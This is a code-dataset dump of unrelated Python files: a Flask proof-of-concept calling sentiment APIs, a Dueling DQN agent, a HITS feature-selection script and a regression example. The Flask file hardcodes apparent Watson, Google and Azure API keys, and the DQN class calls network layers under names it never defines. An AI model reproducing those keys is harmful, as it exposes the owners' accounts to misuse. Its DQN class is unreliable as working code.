"usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 37, "usage_type": "name"}, {"api_name": "wiki.views.revert_to_revision", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 41, "usage_type": "name"}, {"api_name": "wiki.views.view_article", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 45, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 46, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "dictionary.models.Term.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 47, "usage_type": "name"}, {"api_name": "wiki.views.view_article", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wiki.views", "line_number": 51, "usage_type": "name"}, {"api_name": "dictionary.models.Term", "line_number": 52, "usage_type": "name"}, {"api_name": "dictionary.models.Term.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "dictionary.models.Term.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "dictionary.models.Term", "line_number": 53, "usage_type": "name"}, {"api_name": "dictionary.views.view_wiki_article", "line_number": 58, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 58, "usage_type": "name"}, {"api_name": "dictionary.views.article_history", "line_number": 60, "usage_type": "attribute"}, {"api_name": "dictionary.views", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "113397449", "text": "from flask import Flask, request\nfrom flask_cors import CORS, cross_origin\nfrom flask_restful import Resource, Api\nfrom json import dumps\nfrom flask_jsonpify import jsonify\nimport requests\nfrom pprint import pprint\nfrom IPython.display import HTML\nimport time\nimport json\nfrom ibm_watson import ToneAnalyzerV3\n\napp = Flask(__name__)\napi = Api(app)\n\nCORS(app)\n\nwatson_tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey='T1vPKBuKDj1F02HdjW51hkvYv6xV53hol5qDD-PK6SEz',\n url='https://gateway-tok.watsonplatform.net/tone-analyzer/api'\n)\n\ngoogle_base_url = 'https://language.googleapis.com/v1/documents:analyze'\ngoogle_api_key = 'AIzaSyDBUTrdAPZ8MjWPUEodWBPwxJHwCOWdMWE' #google api key\n\nsubscription_key = '3e6e3c6a6a51407f904c1dde59fa2224' #azure subscription key\nassert subscription_key\n\ntext_analytics_base_url = \"https://centralindia.api.cognitive.microsoft.com/text/analytics/v2.0/\"\n\nkey_phrase_api_url = text_analytics_base_url + \"keyPhrases\"\nsentiment_api_url = text_analytics_base_url + \"sentiment\"\n\nheaders = {'Ocp-Apim-Subscription-Key': subscription_key}\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef root():\n content = request.get_json()\n return jsonify(content)\n\n@app.route(\"/cognitive/entities\", methods=['GET', 'POST'])\ndef get_entity():\n content = request.get_json()\n content = {\"documents\":[{'id': i , 'language': 'en', 'text': item['text']} for i, item in enumerate(content['data'])]}\n response = requests.post(key_phrase_api_url, headers=headers, json=content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/cognitive/sentiments\", methods=['GET', 'POST'])\ndef get_sentiment():\n content = request.get_json()\n content = {\"documents\":[{'id': i , 'language': 'en', 'text': item['text']} for i, item in enumerate(content['data'])]}\n response = requests.post(sentiment_api_url, headers=headers, json=content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/watson/entities\", methods=['GET', 'POST'])\ndef tone_analyzer():\n content = request.get_json()\n content = \". \".join(str(x) for x in [item for sublist in [[text['text']] for text in content['data']] for item in sublist])\n tone_analysis = watson_tone_analyzer.tone(\n {'text': content},\n content_type='application/json'\n ).get_result()\n return json.dumps(tone_analysis, indent=2)\n\n@app.route(\"/google/sentiments\", methods=['GET', 'POST'])\ndef get_google_sentiment():\n sentiment_url = google_base_url + \"Sentiment\" + \"?key=\" + google_api_key\n content = request.get_json()\n input_content = get_google_input(content)\n print (input_content)\n response = requests.post(sentiment_url, headers=headers, json=input_content)\n api_response = response.json()\n return jsonify(api_response)\n\n@app.route(\"/google/entities\", methods=['GET', 'POST'])\ndef get_google_entities():\n sentiment_url = google_base_url + \"EntitySentiment\" + \"?key=\" + google_api_key\n content = request.get_json()\n input_content = get_google_input(content)\n response = requests.post(sentiment_url, headers=headers, json=input_content)\n api_response = response.json()\n return jsonify(api_response)\n\n\ndef get_google_input(content):\n flat_list = [item for sublist in [[text['text']] for text in content['data']] for item in sublist]\n list_content = \". \".join(str(x) for x in flat_list)\n input_content = {\"document\":{'type':'PLAIN_TEXT', 'content': list_content },'encodingType': 'UTF8'}\n return input_content\n\nif __name__ == '__main__':\n app.run(port=5001)\n", "sub_path": "server/flask-poc.py", "file_name": "flask-poc.py", "file_ext": "py", "file_size_in_byte": 3579, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 16, "usage_type": "call"}, {"api_name": "ibm_watson.ToneAnalyzerV3", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 75, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 84, "usage_type": "call"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "338261873", "text": "'''\nimplemented by PyTorch.\n'''\nimport numpy as np\nimport torch.nn as nn\nimport torch\nfrom torch.optim import Adam\nimport os\n\n\nclass ReplayBuffer:\n def __init__(self, state_dim, max_size=10000, device=torch.device('cpu')):\n self.device = device\n self.state_buffer = torch.empty((max_size, state_dim), dtype=torch.float32, device=device)\n self.other_buffer = torch.empty((max_size, 3), dtype=torch.float32, device=device)\n self.index = 0\n self.max_size = max_size\n self.total_len = 0\n\n def append(self, state, other):\n self.index = self.index % self.max_size\n self.total_len = max(self.index, self.total_len)\n self.state_buffer[self.index] = torch.as_tensor(state, device=self.device)\n self.other_buffer[self.index] = torch.as_tensor(other, device=self.device)\n self.index += 1\n\n def sample_batch(self, batch_size):\n indices = np.random.randint(0, self.total_len - 1, batch_size)\n return (\n self.state_buffer[indices], # S_t\n self.other_buffer[indices, 2:].long(), # a_t\n self.other_buffer[indices, 0], # r_t\n self.other_buffer[indices, 1], # done\n self.state_buffer[indices + 1]\n )\n\n\nclass DuelingQNet(nn.Module):\n def __init__(self, obs_dim: int, action_dim: int, mid_dim: int = 256) -> None:\n '''\n :param obs_dim: the dim of observation. type: int. for gym env: obs_dim = env.observation_space.shape[0]\n :param action_dim: action space, i.e: The number of actions that can be taken at each step. type:int. for gym env: action_dim = env.action_space.n\n :param mid_dim: hidden size of MLP.\n '''\n super(DuelingQNet, self).__init__()\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n self.encoder = nn.Sequential(\n nn.Linear(obs_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n )\n self.net_val1 = nn.Sequential(\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, 1))\n self.net_adv1 = nn.Sequential(\n nn.Linear(mid_dim, mid_dim), nn.ReLU(),\n nn.Linear(mid_dim, action_dim))\n\n def forward(self, state: torch.FloatTensor) -> torch.FloatTensor:\n # return Q(s, a). the estimated state-action value.\n state = self.encoder(state)\n q_val = self.net_val(state)\n q_adv = self.net_adv(state)\n return q_val + q_adv - q_adv.mean(dim=1, keepdim=True)\n\n\nclass DuelingDQNAgent:\n def __init__(self, obs_dim: int, action_dim: int):\n self.obs_dim = obs_dim\n self.action_dim = action_dim\n self.learning_tate = 1e-4\n self.tau = 2 ** -8 # soft update.\n self.gamma = 0.99 # discount factor.\n self.batch_size = 64\n self.memory_size = 100000\n self.explore_rate = 0.2 # epsilon greedy rate.\n '''\n for exploring in the env, each time will collect self.target_step * self.batch_size number of samples into buffer,\n for updating neural network, each time will update self.target_step * self.repeat_time times. \n '''\n self.target_step = 1024\n self.repeat_time = 1\n self.reward_scale = 1.\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.buffer = ReplayBuffer(obs_dim, self.memory_size, self.device)\n self.DuelingQNet = DuelingQNet(obs_dim, action_dim).to(self.device)\n self.DuelingQNet_target = DuelingQNet(obs_dim, action_dim).to(self.device) # Q target.\n self.optimizer = Adam(self.DuelingQNet.parameters(), self.learning_tate)\n self.loss_func = nn.MSELoss(reduction='mean')\n\n def select_action(self, state: np.ndarray) -> int:\n # using epsilon greedy algorithm to select the action.\n if np.random.random() < self.explore_rate: # epsilon greedy.\n action = np.random.randint(self.action_dim)\n else:\n state = torch.as_tensor((state,), dtype=torch.float32, device=self.device).detach_()\n dist = self.DuelingQNet(state)[0]\n action = dist.argmax(dim=0).cpu().numpy()\n return action\n\n def explore_env(self, env, all_greedy=False) -> int:\n # to collect samples into replay buffer.\n state = env.reset()\n for _ in range(self.target_step):\n action = np.random.randint(self.action_dim) if all_greedy else self.select_action(state)\n state_, reward, done, _ = env.step(action)\n other = (reward * self.reward_scale, 0.0 if done else self.gamma, action)\n self.buffer.append(state, other)\n state = env.reset() if done else state_\n return self.target_step\n\n @staticmethod\n def soft_update(eval_net, target_net, tau) -> None:\n # soft update for network. the equation: W_1 * tau + W_2 * (1 - tau)\n for target_param, local_param in zip(target_net.parameters(), eval_net.parameters()):\n target_param.data.copy_(tau * local_param.data + (1.0 - tau) * target_param.data)\n\n def update(self) -> None:\n # update the neural network.\n for _ in range(int(self.target_step * self.repeat_time / self.batch_size)):\n state, action, reward, mask, state_ = self.buffer.sample_batch(self.batch_size)\n # Q(s_t, a_t) = r_t + \\gamma * max Q(s_{t+1}, a)\n next_q = self.DuelingQNet_target(state_).detach().max(1)[0]\n q_target = reward + mask * next_q\n q_eval = self.DuelingQNet(state).gather(1, action)\n loss = self.loss_func(q_eval, q_target.view(self.batch_size, 1))\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.soft_update(self.DuelingQNet, self.DuelingQNet_target, self.tau)\n\n def evaluate(self, env, render=False):\n epochs = 20\n res = np.zeros((epochs,))\n obs = env.reset()\n index = 0\n while index < epochs:\n if render: env.render()\n obs = torch.as_tensor((obs,), dtype=torch.float32, device=self.device).detach_()\n dist = self.DuelingQNet(obs)[0]\n action = dist.argmax(dim=0).cpu().numpy()\n s_, reward, done, _ = env.step(action)\n res[index] += reward\n if done:\n index += 1\n obs = env.reset()\n else:\n obs = s_\n return res.mean(), res.std()\n\n def load_and_save_weight(self, path, mode='load'):\n if mode == 'load':\n if os.path.exists(path):\n self.DuelingQNet.load_state_dict(torch.load(path))\n self.DuelingQNet_target.load_state_dict(torch.load(path))\n else:\n torch.save(self.DuelingQNet.state_dict(), path)\n", "sub_path": "singleAlgoritm/DiscreteEnvMlpInput/DuelingDQN.py", "file_name": "DuelingDQN.py", "file_ext": "py", "file_size_in_byte": 6816, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.empty", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 91, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.as_tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "438944505", "text": "# Author: Youssef Hmamouche\n\nfrom __future__ import print_function\nimport sys\n#import traceback\nimport glob\n#from os import path\nimport re\nimport os\n#from scipy import *\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import inf\nimport pandas as pd\nfrom joblib import Parallel, delayed\n\nsys.path.append (\"src\")\nimport tools.csv_helper as csvh\n\n#------------------------------#\n#-------- COLORS CLASS --------#\n#------------------------------#\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n#-------------------------------------------------#\n# Pehar #\n#-------------------------------------------------#\ndef hits (fname, output_directory, fname_graph, graph_type, target, iters = 500, min_error =1.0e-3):\n matrix_all = csvh.read_csv_and_metadata(fname_graph, index_col=0)\n \n for i in range (matrix_all.shape[0]):\n for j in range (matrix_all.shape[1]):\n if matrix_all.iloc[i,j] < 0:\n matrix_all.iloc[i,j] = 0\n\n targets = list (matrix_all)\n \n ind_target = 0\n for item in targets:\n if item == target:\n break\n else: ind_target += 1\n\n matrix = matrix_all.values\n\n normalized = True\n n_nodes = matrix.shape[0]\n \n h = np.empty ([n_nodes, 1],dtype=float)\n hlast = np.empty ([n_nodes, 1],dtype=float)\n a = np.empty ([n_nodes, 1], dtype=float)\n \n for node in range (n_nodes):\n h[node] = 1.0 / (float) (n_nodes)\n\n i = 0\n err = 1\n\n while i < iters and err > min_error :\n for node in range (n_nodes):\n hlast[node] = h[node]\n \n for node in range (n_nodes):\n h[node] = 0.0\n a[node] = 0.0\n\n # compute a\n for node in range (n_nodes):\n for pt in range (n_nodes):\n a[pt] += hlast[node] * matrix[node, pt] * matrix[node, ind_target] #* matrix[pt, ind_target]\n \n #hm = [(a[pt], hlast[node] * matrix[node, pt]) for pt in nodes]. reduce (lambda x,y: x + y)\n\n a[np.where(np.isinf(a))]=0.0\n a[np.where(np.isnan(a))]=0.0\n\n # compute h\n for node in range (n_nodes):\n for pt in range (n_nodes):\n h[node] += a[pt] * matrix[node, pt] * matrix[node, ind_target] #* matrix[pt, ind_target]\n\n h[np.where(np.isinf(h))]=0.0\n h[np.where(np.isnan(h))]=0.0\n\n # normalize vector\n s = 1.0 / np. sum (h)\n for n in range (n_nodes): h[n]*=s\n # normalize vector\n s = 1.0 / np. sum (a)\n for n in range (n_nodes): a[n]*=s\n # check convergence, l1 norm\n err = sum ([abs(h[n]-hlast[n]) for n in range (n_nodes)])\n\n i += 1\n\n pd_h = pd.concat([pd.DataFrame (targets), pd.DataFrame(h)], axis = 1)\n\n pd_h.columns = [\"Variabes\", \"Scores\"]\n pd_h = pd_h.drop (pd_h.index[ind_target], axis = 0)\n pd_h = pd_h.sort_values ([\"Scores\"], ascending=False)\n index = [i for i in range(n_nodes-1)]\n\n return pd_h,a\n\n#-----------------------------------#\n# Predict File #\n#-----------------------------------#\ndef predictFile (data, target, output_directory, fname, fname_graph, graph_type, max_features):\n print ('\\t' + \"... Processing: %s\" %(target))\n \n test = 0\n for output_dimension in range (1, max_features + 1):\n out_fname = output_directory + fname.split(\"/\")[len(fname.split(\"/\"))-1].split(\".\")[0] + \"_\" + target + \"_\" + \"Hits_\" + graph_type + \"k=\" + str (output_dimension)+ \".csv\"\n if not os.path.exists(out_fname):\n test = 1\n break\n if test == 0:\n print (\"already done!\")\n #return\n \n \n a, h = hits (fname, output_directory, fname_graph, graph_type, target)\n \n for output_dimension in range (1, max_features + 1):\n out_fname = output_directory + fname.split(\"/\")[len(fname.split(\"/\"))-1].split(\".\")[0] + \"_\" + target + \"_\" + \"Hits_\" + graph_type + \"k=\" + str (output_dimension)+ \".csv\"\n \n #if os.path.exists(out_fname):\n # continue\n try:\n top_k = a.loc[:, 'Variabes'].values[0:output_dimension]\n op_k = np.insert (top_k, 0, target)\n reduced_data = data[op_k]\n\n reduced_data.meta_header['predict'] = [target,]\n method_name = \"Hits_\" + graph_type + \"(n_components=\" + str (output_dimension) + \")\"\n reduced_data.meta_header['method'] = [method_name,]\n csvh.write_csv_with_metadata (reduced_data, out_fname)\n except Exception as e:\n print (\"Error with file: %s\"%(out_fname))\n#-------------------------------------------------#\n# MAIN #\n#-------------------------------------------------#\ndef main():\n fname, output_directory = csvh.parse_selection_arguments(sys.argv)\n data = csvh.read_csv_and_metadata(fname)\n data = data.dropna(axis=1, how='all')\n meta_header = data.meta_header\n targets = meta_header['predict']\n max_features = min(data.shape[1], int (data.meta_header['max_attributes'][0]))\n\n # Search for Adj-matrix for TS file in data folder\n fname_base = os.path.basename(fname).split(\".\")[0]\n \n output_directory_pre_selection = output_directory.replace(\"selection\", \"pre_selection\")\n \n for fname_graph in glob.glob(output_directory_pre_selection + \"/*.csv\"):\n m = re.match(\".*(te|granger)(.*).csv\", fname_graph)\n if m is None:\n print(\"Error: could not match graph_type in filename\", fname_graph)\n continue\n graph_type = m.group (1) + \"_\" + m.group (2)\n \n print (graph_type)\n print (17 * '-')\n Parallel(-1)(delayed(predictFile) (data, target, output_directory, fname, fname_graph, graph_type, max_features) for target in targets)\n #for target in targets:\n# predictFile (target, output_directory, fname, fname_graph, graph_type, max_features)\n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "src/selection/hits_select.py", "file_name": "hits_select.py", "file_ext": "py", "file_size_in_byte": 6151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tools.csv_helper.read_csv_and_metadata", "line_number": 38, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 140, "usage_type": "call"}, {"api_name": "tools.csv_helper.write_csv_with_metadata", "line_number": 146, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 146, "usage_type": "name"}, {"api_name": "tools.csv_helper.parse_selection_arguments", "line_number": 153, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 153, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "tools.csv_helper.read_csv_and_metadata", "line_number": 154, "usage_type": "call"}, {"api_name": "tools.csv_helper", "line_number": 154, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 166, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 174, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "217947270", "text": "# coding=utf-8\n\n\nimport pandas\n\nfrom Regressions.MultivariateLinearRegression import MultivariateLinearRegression, GradientDescent\nfrom utils import add_bias_column, polynomial_addition_1d\n\n\"\"\" Импорт исходных данных из файлов \"\"\"\n\ndj = pandas.read_csv(\"../data/D&J-IND_101001_171001.txt\")\ngasp = pandas.read_csv(\"../data/GAZP_101001_171001.txt\")\nyndx = pandas.read_csv(\"../data/YNDX_101001_171001.txt\")\n\n\"\"\" Предварительная обработка данных \"\"\"\n\nres = pandas.merge(dj, gasp, on='', suffixes=['_DJ', '_GASP'])\nres1 = pandas.merge(res, yndx, on='', suffixes=['_1', '_YNDX'])\ny = res1['_DJ']\nx1 = res1['_GASP']\nx2 = res1['']\n\n\"\"\"Нормализация данных \"\"\"\n\nx1 = (x1 - min(x1)) / (max(x1) - min(x1))\nx2 = (x2 - min(x2)) / (max(x2) - min(x2))\ny = (y - min(y)) / (max(y) - min(y))\n\n\"\"\" Подготовка факторов \"\"\"\n\nx = pandas.concat([x1, x2], axis=1).as_matrix()\nx = add_bias_column(x)\n\n\"\"\" Построение и обучение модели \"\"\"\n\nmodel = MultivariateLinearRegression(degree=2)\nmodel.learning_curve(x, y, plot=True)\nmodel.overfitting_curve(x, y, plot=True)\nmodel.alpha_curve(x, y, plot=True)\nmodel.lambda_curve(x, y, plot=True)\n\nmodel = MultivariateLinearRegression(degree=2)\nmodel.trainer = GradientDescent(model=model, epochs=100)\nmodel.learning_curve(x, y, plot=True)\nmodel.overfitting_curve(x, y, plot=True)\nmodel.alpha_curve(x, y, plot=True, test_size=100)\nmodel.lambda_curve(x, y, plot=True, test_size=100)\n\nmodel = MultivariateLinearRegression(degree=5)\nmodel.trainer = GradientDescent(model=model, epochs=100)\nx1_poly = polynomial_addition_1d(x1.reshape((len(x1), 1)), 5)\nx1_poly = add_bias_column(x1_poly)\nmodel.learning_curve(x1_poly, y, plot=True)\nmodel.overfitting_curve(x1_poly, y, plot=True)\nmodel.alpha_curve(x1_poly, y, plot=True, test_size=100)\n", "sub_path": "examples/1 Linear regression example.py", "file_name": "1 Linear regression example.py", "file_ext": "py", "file_size_in_byte": 1896, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.add_bias_column", "line_number": 32, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 36, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 42, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.GradientDescent", "line_number": 43, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.MultivariateLinearRegression", "line_number": 49, "usage_type": "call"}, {"api_name": "Regressions.MultivariateLinearRegression.GradientDescent", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.polynomial_addition_1d", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.add_bias_column", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "160214693", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 16:59:50 2019\r\n\r\n@author: hp\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nveriler = pd.read_csv(\"musteriler.csv\")\r\n\r\nX = veriler.iloc[:,3:].values #2.kolondan 4 e kadar\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\nkmeans = KMeans(n_clusters = 3, init = \"k-means++\")\r\n\r\nkmeans.fit(X)\r\n\r\nprint(kmeans.cluster_centers_)\r\nsonuclar = []\r\n\r\nfor i in range(1,11) :\r\n kmeans = KMeans(n_clusters = i,init = \"k-means++\", random_state = 123)\r\n kmeans.fit(X)\r\n sonuclar.append(kmeans.inertia_) #inertia = WCSS değerlerini gösterir.\r\n\r\nplt.plot(range(1,11),sonuclar)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "Python ile Makine Öğrenmesi Eğitimi/Bölüm 21/K-Means.py", "file_name": "K-Means.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "192991147", "text": "import spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport pandas as pd\nimport sys\nimport json\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef get_playlist_tracks(playlist_id, sp):\n results = sp.user_playlist_tracks(\"spotify\", playlist_id)\n total_songs = 